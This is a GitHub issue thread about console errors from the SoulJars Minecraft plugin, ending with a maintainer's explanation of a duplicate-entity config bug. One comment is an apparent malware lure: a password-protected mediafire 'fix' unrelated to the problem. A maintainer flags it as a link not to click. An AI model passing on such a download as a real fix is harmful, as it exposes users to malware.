### ISSUE TITLE
来自控制台的错误

### ISSUE THREAD

**Issue by TBedu** [GuizhanCraft/SoulJars-CN#6]
### 检查项目

- [X] 你使用的是从构建站下载的版本
- [ ] 你已经检验过下载的文件的校验和，确认已完整下载文件
- [X] 你没有对下载的文件内容进行任何更改
- [X] 你已经寻找过[已知问题列表](https://github.com/SlimefunGuguProject/SoulJars/issues)，且没有找到相同的问题

### 问题描述

我在控制台中看到了一些错误，我不确定插件是否被加载。

### 复现步骤

1.下载SoulJars汉化最新构建 [构建 #9](https://builds.guizhanss.com/SlimefunGuguProject/SoulJars/master/builds/9)。
2.启动服务器，控制台出现报错。
3.尝试按照 #3 删除`config.yml`中的`EVOKER`及相关内容，依旧报错。

### 预期行为

不应该报错！这让人太难受了。

### 服务器日志

https://paste.guizhanss.net/vgRtZ

### 错误报告

没有看到

### 服务端软件

Paper

### Minecraft 版本

1.20.x

### Slimefun版本

[10:26:24 INFO]: Slimefun 运行的服务器环境:
Paper 1.20.6-147-e41d44f (MC: 1.20.6)
Slimefun dc72b4b-Beta
Java 21

由 StarWishsama 汉化
请不要将此版本信息截图到 Discord/Github 反馈 Bug
优先到汉化页面反馈

安装的附属插件: (22)
  Networks vBuild 100 (git 672c505)
  DyedBackpacks vBuild 3 (git d4e0e45)
  GuizhanLibPlugin vBuild 45 (git 7aef1af)
  AuraSkills v2.2.2
  SlimefunOreChunks vBuild 1 zh-CN(ybw0014) (git 67879ed)
  Residence v5.1.6.2
  HardcoreSlimefun v1.0
  HotbarPets vBuild 4 (git 0faa724)
  EcoPower vBuild 1 zh-CN(ybw0014) (git eca8ab1)
  ExtraGear vBuild 2 zh-CN(ybw0014) (git ff13031)
  SlimefunLuckyBlocks vBuild 2 (git 3ba2eb9)
  ExoticGarden vBuild 19 (git 0994db4)
  InfinityExpansion vBuild 15 (git bebf0bd)
  SlimeGlue v1.0.2-b262a4a
  LiteXpansion vBuild 32 (git 9b0559a)
  ElectricSpawners vBuild 5 (git 6fa0de2)
  ExtraHeads vBuild 3 (git 96ae63c)
  SoulJars vBuild 9 (git f13e461)
  SlimyTreeTaps vBuild 2 zh-CN(ybw0014) (git 8a58b9f)
  MobCapturer vBuild 18 (git 43c76dc)
  PrivateStorage vBuild 1 zh-CN(ybw0014) (git 7205ea3)
  ColoredEnderChests vBuild 4 (git c99f079)

### 插件版本

vBuild 9 (git f13e461)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by TBedu** [comment]
> 嗨，兄弟，要解决您的问题，请尝试此修复程序，我在另一个问题中看到它，https://app.mediafire.com/dqajf1x14ccfd 密码：更改我安装它时，您需要检查安装到路径并选择 USX

This doesn't seem to be related to my issue, are you sure it's this?

**Comment by ybw0014** [comment]
不要点击评论区中**立即回复**的mediafire.com的连接

**Comment by ybw0014** [comment]
配置文件中同时放入 PIG_ZOMBIE 和 ZOMBIFIED_PIGLIN 是为了远古时期的向后兼容（在粘液还支持1.16以下版本的时候）。1.20.6开始会自动将 PIG_ZOMBIE 重写为 ZOMBIFIED_PIGLIN，导致物品重复。
正在修复
